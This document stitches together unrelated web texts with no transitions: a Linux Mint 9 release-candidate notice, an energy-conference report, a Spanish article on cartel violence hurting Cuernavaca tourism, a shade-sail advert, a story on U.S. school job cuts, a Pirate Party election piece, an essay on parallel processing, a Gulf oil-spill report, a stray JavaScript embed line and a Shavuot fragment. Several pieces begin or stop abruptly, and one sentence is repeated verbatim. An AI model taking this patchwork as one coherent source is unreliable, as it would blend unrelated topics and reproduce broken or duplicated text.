To get more information about these problems and their solution , read the “ Known problems ” section of the release notes .
Important information :
As an RC ( Release Candidate ) this release is targeted at developers and beta- testers who want to help Linux Mint find and correct bugs before the stable release .
Please do not use this release as your main desktop .
Java and OpenOffice.org-base
OEM disks
Distributors disks for the USA and Japan
Tomboy Notes
Local repository and Gnome - PPP
To get more information , read the “ Important information ” section of the release notes .
System requirements :
x86 processor ( for both 32 & 64 - bit versions )
x86_64 compatible processor ( for the 64 - bit version )
512 MB of system memory ( RAM )
3 GB of disk space for installation
Graphics card capable of 800×600 resolution
CD - ROM drive or USB port
Bug reports :
Please report any bug you may find in Launchpad .
Download :
Linux Mint 9 RC is available in both 32 & 64 - bit as a liveCD , via Torrent and HTTP download :
Enjoy !
We look forward to receiving your feedback .
Thank you for using Linux Mint and have a lot of fun testing the release candidate !
A shifting center of gravity from the developed to the developing world will redefine the energy landscape over the next two decades .
That 's the theme that emerged from the first panel discussion of this year 's IHS Cambridge Energy Research Associates ' IHS CERAWeek conference in downtown Houston .
The discussion kicked off five days of panels and lectures featuring top energy executives , policy makers and analysts .
Growing economies in Asia , particularly China , and the Middle East , will shape the supply and demand dynamic of everything from oil and gas demand to electricity to the development of renewable energy sources .
“ What will fill the demand ? ” asked Xizhou Zhou , a China expert with IHS CERA .
“ The answer to that question is , really , everything . ”
Despite the evolution of new markets , a two - speed transition is under way , one that will continue to squeeze oil refiners , said James Burkhard , managing director and global oil analyst with IHS CERA .
He said demand peaked five years ago in the Organization of Economic Cooperation and Development , a group of 30 nations including the United States , the United Kingdom and Australia .
The group is responsible for 55 percent of world oil demand .
China represents 10 percent , Burkhard said .
“ The fact that we do n't expect oil demand in the OECD countries to exceed the peak in 2005 is a very substantial development , ” Burkhard said .
Refiners will be forced to trim capacity utilization amid a flat or declining trend in some of the biggest refined products markets , even as new opportunities evolve in developing economies .
Breaking a 20 - year trend , Burkhard said , a further market shift has oil production capacity swinging away from a period of diversification among nations to one in which capacity is potentially concentrated in 15 countries , called the Oil or O - 15 , most in Africa and the Middle East .
The list does not include the U.S .
The outlook for natural gas development , by contrast , points toward more localization and regionalization as nations around the world begin exploiting the abundant natural gas reserves from unconventional sources , such as shale .
The outlook for natural gas development , by contrast , points toward more localization and regionalization as nations around the world begin exploiting the abundant natural gas reserves from unconventional sources , such as shale .
“ Globally , our estimates put recoverable shale gas at between 5 and 16 quadrillion cubic feet .
That 's over 150 years of supply at today 's current global consumption levels , ” said Rafael McDonald , an IHS CERA expert in the liquefied natural gas area .
Shale deposits occur in almost every corner of the world .
If the success achieved in the U.S. , which has increased natural gas production from shale from 14 percent in 1990 to 50 percent last year , can be replicated globally “ we would more likely see a refragmentation , ” McDonald said .
The biggest story , however , is the anticipated growth in China and the demands that growth will place on the world 's current energy capacity .
“ Asian governments are increasingly aware of the fact that indigenous resources within the region right now are not sufficient to meet the very robust growth trends we see going forward , ” Zhou said .
While China 's population growth is expected to slow over the next two decades as its one - child only policy curbs new births , the country 's gross domestic product will grow at a quick clip .
China 's share of world GDP is expected to rise from 8.4 percent to 26.8 percent in around 2025 , surpassing the United States ' share — now at 24.5 percent and expected to fall to 16.2 percent , said Nariman Behravesh , IHS chief economist .
“ Asia is still and will be for the next 20 years or so the star region .
They are the region that is going to grow very , very rapidly compared with other regions , and even faster than other emerging regions , ” Behravesh said .
monica.hatcher@chron.com
Desde el 16 de diciembre de 2009 , cuando Arturo Beltrán Leyva  El Barbas cayó muerto durante un enfrentamiento con la Marina en una exclusiva zona habitacional de Cuernavaca , la ciudad no es la misma : bares , discotecas y hoteles lucen semivacíos
CUERNAVACA , Mor. —
Es viernes de mayo , se acerca la media noche .
La discoteca Boracay parece un restaurante romántico , semivacío , sin escándalo .
Hace cinco meses era el antro más visitado por los jóvenes en Cuernavaca .
Todos — la mayoría visitantes del Distrito Federal — bailaban con copa en mano , reían , caminaban con dificultad entre las mesas por la cantidad de personas que ahí se reunían .
Algunas noches , los encargados llegaron a contar hasta mil clientes .
Ahora los meseros y hostess están parados en la puerta de la discoteca con la expectativa de quien ansía la llegada de un personaje importante .
Pero muy pocos jóvenes llegan al lugar .
Sólo 23 clientes ocupan las mesas del fondo .
Boracay no es el único lugar que está lleno de soledad .
Desde hace cinco meses , la tradicional vida nocturna en Cuernavaca y las imágenes de sus discotecas a reventar son un recuerdo fotográfico en las redes sociales .
La zona restaurantera es un enjambre de calles a media luz , desolada .
Las recepciones de los hoteles reciben de vez en cuando a ermitaños turistas .
Los fines de semana en la ciudad de la eterna primavera — como se le conoce a Cuernavaca — se convirtieron en invierno , desde el 16 de diciembre de 2009 .
Habitantes , autoridades , empresarios y turistas viven desde entonces los efectos de las disputas entre las bandas del crimen organizado por la estratégica ubicación de Cuernavaca .
La lucha por el control del territorio que protagonizan el cártel de los Beltrán Leyva y el del Pacífico
Sur transformó en 24 semanas a una ciudad de descanso y diversión para los capitalinos , principalmente , en un lugar plagado de incertidumbre y temor .
El turismo es una de las principales actividades económicas en Morelos .
El 90 % de los clientes de todos los negocios turísticos son capitalinos , pero la violencia alejó a la mayoría .
Los empresarios de este ramo creen que esta caída en la visita de paseantes es producto de un problema que creció como bola de nieve por la crisis económica , el desordenado crecimiento de la ciudad , la insuficiencia de servicios y la delincuencia común , pero que se acentuó cuando las primeras planas de los periódicos retrataron una parte de la realidad morelense : una lista de por lo menos 70 ejecutados — dos de ellos aparecieron colgados afuera del principal centro comercial de Cuernavaca — , un correo electrónico que impuso el “ toque de queda ” a habitantes y la quema de negocios nocturnos .
Desde diciembre pasado la afluencia de clientes en bares y discotecas cayó en 70 % .
En los hoteles , desde enero se reporta una baja mensual de entre 8 % y 10 % en sus ocupaciones .
La venta de casas y departamentos disminuyó en 30 % y se frenó la adquisición de propiedades en los grandes desarrollos inmobiliarios .
Al menos 30 % de los agremiados a la Confederación Patronal de la República Mexicana ( Coparmex ) abandonaron el estado para instalar sus negocios en el Distrito Federal y Puebla .
La mayoría de ellos , del ramo hotelero y restaurantero .
Lo que faltaba Jaime Rubí , presidente de la Asociación de Hoteles de Morelos , describe la situación que desencadenó el desplome de la industria turística en el estado .
La caída , dice , se remonta al año 2008 , cuando las calles de Cuernavaca y otros poblados aledaños fueron ocupadas por maestros en protesta por la Alianza por la Calidad de la Educación y cuyas movilizaciones fueron reprimidas por elementos del Ejército y las policías estatal y federal .
Las noticias de maestros torturados y desaparecidos llegaron a todo el país y , por supuesto , a la capital .
A finales de ese año y principios del 2009 , en el estado se registró una epidemia de dengue .
En Temixco — un municipio ubicado a 20 minutos de Cuernavaca — la enfermedad producida por el piquete de un mosco colocó a Morelos en los primeros lugares del país por su alta incidencia .
El dengue clásico afectó a 983 personas y el hemorrágico — de mayor gravedad — infectó a 134 habitantes .
Rubí dice que aún quedaban los rezagos de esta epidemia cuando se conoció la existencia del virus de la influenza A H1N1 en el país , lo que obligó a bares , restaurantes y discotecas a cerrar por decreto .
“ Después vino la crisis económica y rematamos en diciembre con los actos delictivos .
Cuando pensamos que Morelos era uno de los estados sin la presencia del narcotráfico , comenzamos a ver las ejecuciones ” , señala el presidente de la Asociación de Hoteles de Morelos .
Andrés Remis Martínez , presidente de la Asociación de Discotecas , Bares y Centros de Espectáculos de Morelos , asegura que ni la epidemia de la influenza provocó una caída tan drástica en sus ventas como lo hizo ahora la violencia .
“ En ese entonces todos cerramos , los del DF , los de Acapulco , todos , pero después tomando nuestras previsiones , los clientes regresaron ” .
El 16 de diciembre de 2009 , murió en Cuernavaca el narcotraficante Arturo Beltrán Leyva tras un enfrentamiento con elementos de la Secretaría de Marina .
El líder del cártel vivía en un departamento del fraccionamiento Altitude , un conjunto residencial ubicado en Punta Vista Hermosa .
Desde entonces , comenzaron a registrarse una serie de ejecuciones que atemorizaron a morelenses y visitantes , “ de los efectos de la violencia no nos hemos podido recuperar porque vamos de un evento a otro ” .
Viernes de pánico
La zozobra invadió las calles de la ciudad de la eterna primavera .
Turistas y habitantes vivieron los últimos cinco meses entre balaceras , narcomensajes y ejecutados , pero su peor día fue el viernes 16 de abril de este año .
El anuncio de un supuesto “ toque de queda ” en Cuernavaca , por parte de presuntos integrantes del cártel del Pacífico Sur , tambaleó la estabilidad social , económica y política del estado .
Para Juana Romero , vecina de Cuernavaca desde hace 10 años , su vida en la ciudad de las bugambilias cambió desde “ ese viernes negro ” .
Rutinas , planes , gastos , en sí la organización familiar se modificó .
“ Impusimos un horario para regresar a casa , nos hablamos por teléfono varias veces al día para saber dónde andamos y notificamos a cada miembro de la familia y a los amigos de algún evento que nos parece fuera de lo común : camionetas misteriosas circulando por las calles u hombres sospechosos .
Ya nada es igual .
Nos volvimos medio paranoicos .
Hasta pensamos en regresar a vivir al Distrito Federal ” .
Arturo , mesero del restaurante El Faisán , con 50 años de tradición en la ciudad , comenta que ese viernes cerraron como a las siete de la noche , cinco horas antes de su horario habitual .
“ Nos dieron la orden de irnos a la casa .
Atendimos muy pocas mesas .
En esos días las propinas se cayeron como en 70 % .
La gente del Distrito Federal , nuestros principales clientes , dejaron de venir por miedo ” .
Rodrigo López Laguardia , presidente de la Cámara Nacional de Comercio , Servicios y Turismo de Cuernavaca , reconoce que el llamado de un supuesto “ toque de queda ” para terminar actividades a partir de las 8 de la noche , que se difundió por mail y por las redes sociales en internet , le costó a empresarios del ramo turístico alrededor de 10 millones de pesos .
Las amenazas a la población que se difundieron por internet , no sólo afectaron la vida de ciudad , ahuyentaron al turismo , “ actividad de la que Cuernavaca depende en un 40 % ” .
López Laguardia admite que la imagen de Morelos está muy deteriorada por la cadena de hechos violentos que han ocurrido en la entidad y por la difusión mediática que se ha hecho .
“ Revertir el daño causado no va a ser fácil .
Los tres fines de semana que siguieron al ‘ viernes negro ’ causó que la economía de la ciudad se paralizara porque la violencia asustó a los turistas ” .
“ Se ha registrado desempleo , sobre todo por despidos en bares y restaurantes que vieron mermadas sus ganancias ante la falta de turistas .
Muchos empresarios optaron , en las últimas semanas , por recortar horas de trabajo a cocineros , meseros y ayudantes para no dejar a la gente de plano sin ingresos ” , comenta Laguardia .
Los representantes de la Asociación de Discotecas y de Hoteles de Morelos consideran que cuando comenzó a circular el correo electrónico del 16 de abril de este año , las autoridades municipales y estatales debieron aclarar públicamente que se trataba de un mensaje sin fundamento e invitar a la población a que saliera a las calles para no dar una impresión mayor de inseguridad al exterior .
“ Con lo que pasó ese día , dimos la impresión de que hay miedo e ignorancia .
El problema es que ninguna autoridad salió a desmentir el correo electrónico y ahora los únicos visitantes que llegan a Cuernavaca son los que tienen casas , pero se quedan encerrados en ellas y los demás , prefieren seguirse hacia Acapulco o a Taxco ” , dice Javier Ordóñez , propietario de una discoteca en la ciudad .
Se respira inseguridad Las consecuencias sociales y económicas se palpan al recorrer las calles de Cuernavaca , famosa por ser el centro de descanso de miles de capitalinos desde la época de la realeza azteca .
Un militar de alto rango en la Secretaría de la Defensa Nacional que acostumbra pasar los fines de semana en su casa de Cuernavaca con su familia , lamenta el ambiente que se vive en la ciudad desde diciembre de 2009 .
“ Nos rodea la inseguridad .
Salir a la calle implica un grave riesgo porque no sabes en qué momento te va a tocar la mala fortuna de quedar en medio de un tiroteo y ser parte de las víctimas ” .
Vecino de fin de semana y experto en temas de seguridad nacional , omite decir su nombre pero reclama : “ Aquel viernes negro los ciudadanos nos informamos como pudimos de los verdaderos riesgos de la amenaza que se envío por internet porque en el estado hubo una total ausencia de autoridad ” .
Afuera de la iglesia de Santa María de la Misericordia en la colonia Vistahermosa en Cuernavaca , centro de reunión de católicos del Distrito Federal , el militar reconoce que si los miembros del crimen organizado pretendían causar miedo entre la sociedad “ lo lograron plenamente y no sólo por un día , la psicosis se quedó entre nosotros .
Ahora somos más cautelosos para salir a los restaurantes o a los bares ” .
Para las familias como la de Juana y el militar , que poseen residencias en la ciudad de la eterna primavera , los días de descanso ya no volvieron a ser los mismos .
“ Yo le digo a mis hijos y nietos que cuando escuchen un tiroteo se alejen de las ventanas , se tiren al suelo y que se resguarden en zonas protegidas por más paredes para que no sean alcanzados por las balas ” .
Al término de la misa de Santa María de la Misericordia a la una de la tarde del domingo 16 de mayo , otros capitalinos se quejaron .
“ Desde mediados del año pasado y los primeros meses de 2010 ha sido muy peligroso andar por las calles de Cuernavaca .
La presencia de militares y de policías federales , a veces da confianza y a veces da temor ” , expresó Rosa María antes de abordar su camioneta con rumbo a la ciudad de México .
Andrés Remis , presidente de la Asociación de Discotecas , observa el desolado ambiente de la discoteca Boracay y dice : “ La afluencia ( de visitantes ) ha bajado de manera salvaje ” .
Asegura que desde ese “ viernes negro ” , cuando las discotecas estuvieron vacías , “ arrastramos una mala racha , con una disminución de nuestra clientela de entre 60 % y 70 % .
El 90 % de nuestros clientes son del DF y vemos que prefieren irse a Acapulco .
Los jóvenes que viven en Cuernavaca ahora se van al DF porque lo consideran más seguro ” .
En Semana Santa , donde había hasta sobrecupo en la ciudad , los bares y discotecas no llenaron ni 30 % de sus espacios .
Señala que ante esta disminución del turismo capitalino , han adoptado diversas medidas como recortar nóminas , regresar a su casa a los trabajadores y ofrecer mayores medidas de seguridad — contratar un sitio de taxis , servicio de paramédicos y colocar detector de metales — para que los clientes se sientan más protegidos .
Javier Ordóñez es empresario discotequero desde hace 24 años en Cuernavaca y dueño de Taizz , otro de los centros de baile más famosos en esta ciudad y el consentido entre los capitalinos .
“ Normalmente tenía más de 500 clientes pero desde ese viernes ( 16 de abril ) el mayor número de gente que he tenido fue en Semana Santa cuando llegaron 87 personas , entonces esta situación sí me ha afectado bastante ” .
Aunque no se han hecho los cálculos exactos de las pérdidas económicas que este problema ha traído para el sector empresarial , a Ordóñez le preocupa el futuro inmediato de su negocio .
“ Tengo 89 empleados , tan sólo el pago del seguro social es de 40 mil pesos y me siento ahorcado porque no tengo esos ingresos .
Y si la gente viene y ve lugares vacíos menos entran .
Los antros llenos les dan más tranquilidad ” .
Triste primavera El 98 % de los huéspedes en Cuernavaca son del Distrito Federal .
Las grandes cadenas — que sólo hospedan a 10 % de los turistas en el estado — , pero sobre todo los hoteles menores a las cuatro estrellas , resintieron la decisión de los capitalinos de no visitar con tanta frecuencia como se hacía antes la ciudad de la eterna primavera y sus alrededores .
“ Las bajas en los niveles de ocupación se registran en todo el estado de Morelos .
En enero de este año , comparado con enero de 2009 , tuvimos una baja en el hospedaje de 16 % y esto sí se puede atribuir a los hechos delictivos que se registraron después del 16 de diciembre ” , asevera Jaime Rubí , presidente de la Asociación de Hoteles de Morelos , que agrupa a los dueños de 138 hoteles en el estado .
La triste primavera para los morelenses está por terminar , pero la llegada de las vacaciones de verano tampoco les alienta .
“ No creo que nos podamos recuperar en verano .
Y no por los narcos sino porque una caída tan fuerte no se recupera de la noche a la mañana .
Con la experiencia que tengo en el mercado , salir de esto , no nos va a llevar menos de seis meses ” .
El sector inmobiliario tiene también dificultades que , aunque aún no son de grandes dimensiones , son contrarias a lo esperado por un mercado que debería ser próspero .
“ No podría decir si tenemos pérdidas porque , a diferencia de otras actividades económicas , los proyectos inmobiliarios siguen aunque se han mermado las ventas .
Por experiencia propia , percibimos que se ha frenado la venta .
No es algo demasiado representativo , pero sin duda la cuestión de la inseguridad es algo que preocupa a la gente y por eso está posponiendo su decisión de compra ” , destaca Germán Ahumada Alducín , presidente de la Asociación Mexicana de Desarrolladores Inmobiliarios .
El también encargado de uno de los proyectos más ambiciosos en Cuernavaca donde se prevé la venta de mil 500 terrenos y viviendas en una zona residencial que incluye campo de golf , afirma que “ ya vendimos 60 % pero las ventas se asentaron desde que inició este año .
No es tan drástico como para hablar de pérdidas económicas pero este año esperábamos un repunte ” .
La plusvalía no ha variado , pero “ esperamos que se controle la inseguridad en todo el país porque si el problema continúa las afectaciones serán más drásticas y el golpe más duro es que se frenen las inversiones .
En este momento los desarrollos no se pueden dejar a la mitad , pero tampoco se pueden hacer nuevas inversiones si hay incertidumbre ” , asegura .
Angélica Aguilar , corredora de bienes y raíces en Cuernavaca , reconoce que sus ventas bajaron de diciembre a la fecha .
“ En Altitude y Limoneros seguimos vendiendo casi igual a pesar de los operativos militares .
Lo que nos ha costado más trabajo acomodar son las propiedades individuales y las casas en fraccionamientos más pequeños .
La gente tiene miedo por la inseguridad .
Le temen a los narcos pero más a los delincuentes comunes ” .
Desconfianza empresarial
Los capitalinos no son los únicos que han dejado a Cuernavaca entre sus preferencias , también algunos empresarios .
El propio gobierno de Morelos lo manifiesta en su Plan Municipal de Desarrollo 2009 - 2012 , elaborado por el presidente municipal Manuel Martínez Garrigós , en marzo pasado .
Al describir cuál es el entorno actual en Cuernavaca el funcionario señala : “ De acuerdo con datos de la Confederación Patronal de la República Mexicana ( Coparmex ) en Morelos , al mes de enero de 2010 , entre 20 % y 30 % de los agremiados han abandonado la entidad ” .
Juan Carlos Salgado , presidente de la Coparmex en Morelos , dice que el momento más álgido de la crisis ocurrió hace un mes , después del “ viernes negro ” y aunque “ ahora estamos tomando las medidas necesarias para evitar que esto vuelva a suceder ” , 30 % de sus agremiados sacaron sus inversiones del estado .
“ La difícil situación en el estado , no sólo por los delitos del fuero federal sino también por los del fuero común , propició un temor entre la ciudadanía en general y en el sector empresarial varias familias optaron por salir de Morelos para buscar mejores horizontes , un mayor desarrollo económico y la tranquilidad de sus familias ” , indica el dirigente empresarial .
Pero él , a diferencia de los hoteleros y discotequeros , percibe mejorías .
Refiere que “ en abril había un alejamiento de las autoridades con los empresarios y la ciudadanía y nosotros éramos muy críticos de eso , pero ahora las cosas cambiaron , hay una mayor comunicación y las autoridades municipales y sobre todo , las estatales , están actuando para evitar otra crisis similar ” .
A partir del 19 de abril , los empresarios del estado mantienen mesas de trabajo con los representantes de las secretarías de gobierno para acordar y poner en marcha una serie de medidas que les ayuden a enfrentar la ausencia de visitantes y las alertas provocadas por la delincuencia .
Los empresarios ahora tienen un número 01 800 y una clave de contacto directo con la policía para su intervención inmediata en caso de cualquier incidente .
También están ideando una campaña para atraer de nuevo a los visitantes .
“ Todas estas acciones van a servir para recuperar la confianza de los empresarios y que los turistas regresen a nuestro estado , asegura Juan Carlos Salgado , presidente de Coparmex en Morelos .
El gobierno de Cuernavaca reconoce este atraso turístico en su Plan Municipal de Desarrollo , en donde alerta : “ En una consulta popular que realizó el Ayuntamiento de Cuernavaca se señaló que hasta la fecha nadie ha podido evitar que Morelos , particularmente Cuernavaca , sean simples lugares de paso de los capitalinos que , por ignorar lo que el estado ofrece , prefieren continuar su camino hacia Taxco o Acapulco ” .
El municipio calcula que entre los habitantes del Distrito Federal , Toluca y Querétaro hay alrededor de 20 millones de turistas en potencia .
Daños colaterales Marco Antonio Adame Castillo , gobernador de Morelos , celebraba tres semanas de calma en el estado .
En sus cifras , los efectos del “ viernes negro ” se empezaron a desvanecer .
Nos estamos recuperando , aseguró a EL UNIVERSAL .
Pero 35 días después del “ toque de queda ” , la violencia volvió a “ tomar ” las calles de Cuernavaca , Morelos .
El viernes 21 de mayo , un grupo de hombres armados arrojaron granadas al interior de la discoteca Classico ubicada sobre la avenida Plan de Ayala , zona que concentra los principales centros de diversión en la ciudad .
Andrés Remis Martínez , presidente de la Asociación de Discotecas , lamenta : “ Ese viernes pensamos que ya nos íbamos a empezar a recuperar porque vimos gente en la calle .
Después de tres semanas de relativa calma , los asiduos paseantes nocturnos , se confiaron y comenzaron a llegar a los bares y discotecas ” .
Esas horas de esperanza se fueron desvaneciendo pasadas las nueve de la noche cuando un grupo de hombres armados arribó a la discoteca Classico , amenazaron al personal , rociaron de gasolina el lugar y lanzaron un artefacto explosivo .
“ El sábado en la noche Cuernavaca volvió a lucir desolada .
Por miedo y precaución la gente se resguardó en su casa .
Los cines , restaurantes , bares y discotecas volvieron a lucir vacíos , abandonados ” , se queja Remis Martínez .
Las instalaciones de la discoteca Classico quedaron destrozadas en un 90 % .
Los dueños del lugar calculan que las pérdidas son millonarias .
En el antro laboraban 40 personas , mismas que pasaron a la lista de los desempleados por los efectos de la violencia .
“ La inseguridad nos están pegando a todos .
Es necesaria una mayor presencia y compromiso de las autoridades para abatir la impunidad con que actúan los delincuentes ” , reclama el discotequero .
No es posible , lamenta Remis Martínez , que ( los delincuencia organizada ) tenga la sangre fría para atacar un lugar que se ubica en una zona tan transitada de la ciudad .
“ Eso parece como un desafío para la autoridad ” .
La primavera acabará en tres semanas en todo el país , pero en Cuernavaca se terminó desde diciembre .
Tenshon has had the privilege of providing the highest quality shade solutions to customers all over the world .
When we say we distribute our products “ worldwide , ” we really mean it .
For over a decade , we have provided thousands of commercial and residential shade sails in almost every state in the USA as well as in places like the Ukraine , China , Mexico , Saipan , Canada , United Kingdom and Croatia .
We know it ’s easy to say we have thousands of happy customers and products all over the world and hope you ’ll believe us .
So , we ’d like to take it one step further and show you where our customers are located .
Click on the map markers to zoom in and see an actual satellite image of some of our installed shade products .
* Images may not be available at all locations .
All map markers represent an individual customer Tenshon has sold at least one shade product to in the last 3 years .
Tenshon does not have control over how often Google updates their map images and some customers may remove their shade sails during certain times of the year or during certain weather conditions .*
More than 80 % of school districts to cut jobs
NEW YORK ( CNNMoney.com ) --
More than 80 % of U.S. school districts are expected to eliminate jobs and more than half will likely freeze hiring during the upcoming school year , an education organization said Tuesday .
Based on a survey of school administrators from 49 states , a total of 275,000 education jobs are expected to be cut in 2011 , according to the American Association of School Administrators .
" Faced with continued budgetary constraints , school leaders across the nation are forced to consider an unprecedented level of layoffs that would negatively impact economic recovery and deal a devastating blow to public education , " said AASA Executive Director Dan Domenech .
While the jobs picture begins to stabilize across the broader economy , in its previous survey , the AASA projected job cuts in the education field between 2009 and 2011 to exceed the jobs created by the government in that same period .
In the survey released Tuesday , AASA said job cuts in the 2010 to 2011 school year alone would nearly negate the estimated 300,000 jobs saved or created by the government .
" This survey complements the results of our latest economic impact survey to truly illustrate that schools have yet to feel the economic relief and stability that is appearing in other sectors , " said Domenech .
Of the projected job cuts , about 54 % are teacher positions , 9 % are support personnel , such as nurses and guidance counselors , 5 % are administrative and 31 % are classified , a category including maintenance employees and cafeteria workers .
The sample of Kindergarten through 12th grade public schools used in the survey accounts for about 11 % of the nation 's school districts .
And while 48 million students are expected to attend school next year , these significant job cuts are projected to raise the average student - to - teacher ratio from 15:1 to 17:1 , AASA said .
For those districts that do n't cut jobs , it 's likely that they will freeze hiring instead , with 53 % of districts projecting that they will not be bringing on new employees in the next school year .
The Epic War® Warcraft 3 Map Database
Quick - search for a map :
Affiliates
WC3MapDB 2.2.5 - ©2004-2019 Epic War®
Maps are provided as is and are not guaranteed to be without errors .
Warcraft is ©2002-2003 Blizzard Entertainment
The UK Pirate Party is just over one year old , but already it 's participating in the General Election with candidates in nine constituencies .
Pirate Party voters who go to the polling booth today can be assured that , contrary to recent rumors , it is okay to wear a pirate costume .
The General Election is dominating the news in Britain today .
Westminster Council ’s Nigel Tonkin , who has been organizing elections for 35 years , has been commenting to the BBC on the do ’s and do n’t at the polling station .
He confirmed that party insignia and emblems are not allowed , but that Pirate Party voters are free to show up in a pirate costume .
“ There ’s a candidate standing in Westminster as a pirate .
And if he comes in to vote in a pirate costume as is likely , we wo n’t turn him away .
The same goes for any supporters coming to vote as pirates . ”
Parrots and other pets are also welcome at the polling stations , Tonkin said .
In all seriousness , the UK Pirate Party is no joke .
They stand for real issues that are dear to the hearts of voters but are often overlooked by other politicians .
The passing of the Digital Economy Act is a prime example of where the public opinion differs from that of the lawmakers .
As with the Swedish party in last summer ’s EU elections , not all the candidates are fresh faced youngsters .
Quite a few are definitely middle - aged , including party leader Andrew Robinson ( 41 ) who ’s confident that his party can make a difference if given the chance .
“ Today we can strike fear into the hearts of our enemies , Andrew Robinson says .
“ Today we can show them that we will no longer sit idly by as they take away our rights , as they take away our privacy , as they force greater and greater burdens and costs on us while lining their own pockets . ”
“ Today , we show them what can be achieved by real men and women , scattered across the country , connected by technologies the other parties still struggle to understand , ” Robinson added .
The polling stations will close 10 PM local time , the first results are expected to come in later in the evening .
The Pirate Party candidates are :
What if I took to the pages of a major business magazine and made the bold recommendation that , because humans have run out of new places on Earth that we can migrate to , it is past time for us to make the collective leap to faster - than - light travel so that we can explore neighboring solar systems ?
Your reaction would probably be something like , " Yes , of course everyone would love to go faster than light , and if it were as easy as just deciding we all want to do it then it would be done already . "
That 's pretty much how I felt after reading a recent Forbes op - ed by NVIDIA 's Bill Dally , in which he declares , " It is past time for the computing industry — and everyone who relies on it for continued improvements in productivity , economic growth and social progress — to take the leap into parallel processing . "
Obviously yes , we would all love to just magically jump right into parallel processing , and transform all of our existing serial workloads into parallel workloads .
But there are two big problems : 1 ) nobody knows the percentage of existing serial workloads that can be usefully parallelized ( but it 's probably small ) , and 2 ) parallel programming is hard .
A lot of serial , not as much parallel
Note that in the preceding paragraph , I spoke of " workloads " and not " programs . "
That 's because the problem is n't that existing software has been written one way and it needs to be rewritten in some new way .
It 's that the tasks that the software carries out are inherently serial .
Of course , Dally is well aware of this distinction , but he conveniently ignores it because it does n't help his point .
However , the example that Dally uses to illustrate the difference between serial and parallel is actually a very good illustration of the fact that we can't just rewrite serial software and make it parallel .
Here 's Dally 's analogy : " Reading this essay is a serial process — you read one word after another .
But counting the number of words , for example , is a problem best solved using parallelism .
Give each paragraph to a different person , and the work gets done far more quickly . "
Yep , the process of reading is definitely serial — there 's no way to accomplish the task in parallel ( believe me , I 've tried ) , and no amount of programming wizardry will make it otherwise .
Word counts , on the other hand , can be done either in serial or in parallel ; but counting words is a much less interesting and useful undertaking than reading .
As with reading vs. word counts , it has so far turned out that the main bulk of ordinary computing tasks that are interesting and worthwhile are serial tasks ; the parallel stuff , while critically important in a few key verticals , is niche .
This is unfortunate for NVIDIA , because NVIDIA is in the parallel business .
Now , it could ultimately happen that the set of " interesting things that we want to do with computers that are best done in parallel " will one day grow larger than the set of " interesting things that we want to do with computers that can only be done serially , " and if that happens that will be great for everyone ( not just NVIDIA ) ; but so far we appear to be on track for the opposite outcome .
Ultimately , NVIDIA 's fundamental problem boils down to this simple fact : you can do parallel tasks in a serial manner , but you can't do serial tasks in a parallel manner .
What this means for computing 's history up until now is that everyone started out making serial hardware , with the result that parallel tasks have tended to be done in serial because that 's the hardware that was available .
Some percentage of those tasks can be rethought to work in parallel , but , as I said above , so far this percentage has been disappointingly low .
Are our programmers learning ?
Dally talks a bit about practices and approaches , as if writing parallel software is mainly a matter of tools and training .
Would that it were so .
There are some folks who honestly believe that if we gave computer science students the right tools for explicitly expressing parallelism and we totally reformed the comp sci curriculum so that students are trained to use these tools from day one , we 'd enter into some sort of golden age of parallelism .
But the number of people who think this way is shrinking , at least from what I 've informally observed .
This issue came up in an untranscribed portion of the conversation that I had with Stanford president and RISC pioneer John Hennessy , and it has come up in many other conversations that I 've had since with folks in the field : most humans just do n't seem to be wired to be able to learn to do parallel programming at the level that our processor hardware now demands .
It 's not that it can't be done — a few people can really take to it and do it well .
But , like the innate potential to become a chess grandmaster , the innate potential to be a real parallel - programming wizard is not evenly distributed in the population .
Some professors and CS grad students I 've talked to have observed the same thing I have : that when you get to the point in a computer science curriculum where you introduce parallel programming , you lose too many students .
Right now , it 's probably fair to say that the " tools and training will fix it " school of thought is still the mainstream , but as core counts increase and the gap widens between our hardware 's peak theoretical performance and what real - world , ordinary programmers can actually get out of that hardware , we 'll see more people concede that programmers just need to be able to write serial code that the machine then parallelizes for them .
In other words , the programmer will get the board ready , and some software and / or hardware designed by grandmasters will then take over and do all of the grandmaster - level chess playing .
Right about one thing : it will take time
Responding to this essay is ultimately like fighting a heavyweight boxer who has both hands tied behind his back .
Dally is a smart guy with impeccable credentials , and with this short , nonspecialist essay format he appears to have fallen into a common trap that ensnares specialists of all types when they 're not good at writing for a lay audience but they 're pressed into doing so for commercial reasons , i.e. he got just enough rope to hang himself .
I would love to read a longer technical essay by him where he tries to make whatever points he intended to make with this piece , but using his own terms .
In the end , I can definitely agree with him on one thing : the industry has a long slog ahead of it before it 's ready to start using Moore 's Law to once again deliver the kinds of performance gains ( as opposed to functionality and system - level power efficiency increases ) that it gave us up until recently .
That process will take not just time , but a whole lot more investment in fundamental computer science research .
USF Scientists : Deepwater Horizon Spill Oil in Loop Current ; Complex Water Movement Slows Slick 's Threat to Florida
By Vickie Chachere
ST . PETERSBURG , Fla. ( May 27 , 2010 ) – Oil spreading from the ruptured Deepwater Horizon well has reached the Gulf of Mexico's Loop Current , but predicting where the oil is going continues to be a challenge for scientists .
The fast - moving , warm waters of the Loop Current and the unprecedented nature of the spill require constant monitoring .
The latest estimates from the USF College of Marine Science 's Ocean Circulation Group released Thursday indicate a portion of the Loop Current moving clockwise could keep the oil slick away from the southern Gulf for a few more days , allowing the oil to become more weathered .
The circling loops within the current , however , are known to reconnect .
Using data gathered from five different models tracking the spilled oil , the group - led by USF physical oceanographer Robert Weisberg - expect that the oil will move rapidly through the warm water of the Loop Current .
Earlier projections had put the oil on a path from the northern gulf to the Florida Keys and then continue through the Straits of Florida and up the Atlantic Coast .
The new projections potentially buy Florida a few more days before the oil nears ecologically sensitive areas of the gulf .
USF researchers on a mission aboard the R/V Weatherbird II to further investigate the spread by collecting water samples and using high - tech sensors which will be able to gather data on conditions in the gulf .
The R/V Bellows returned from the Loop Current on Monday and has reported no obvious signs of oil there .
However , researchers did find what they suspect could be a small patch of weathered oil .
Additional lab studies are underway to verify the material and its possible origins .
cnxps.cmd.push(function ( ) { cnxps ( { playerId : '36af7c51-0caf-4741-9824-2c941fc6c17b ' }) .render('4c4d856e0e6f4e3d808bbc1715e132f6 ' ) ; } ) ;
Whether you prefer eating cheesecake or blintzes , kreplach or burekas , all Shavuot dishes share one common ingredient : milk .
The tradition has many possible derivations .
Some point to the scripture , consuming dairy to symbolize " the land flowing with milk and honey " ( Exodus 3:8 ) .
Kabbalists calculate the numeric value of the word , milk , ( het=8 , lamed=30 , vet =2 ) to equal forty .
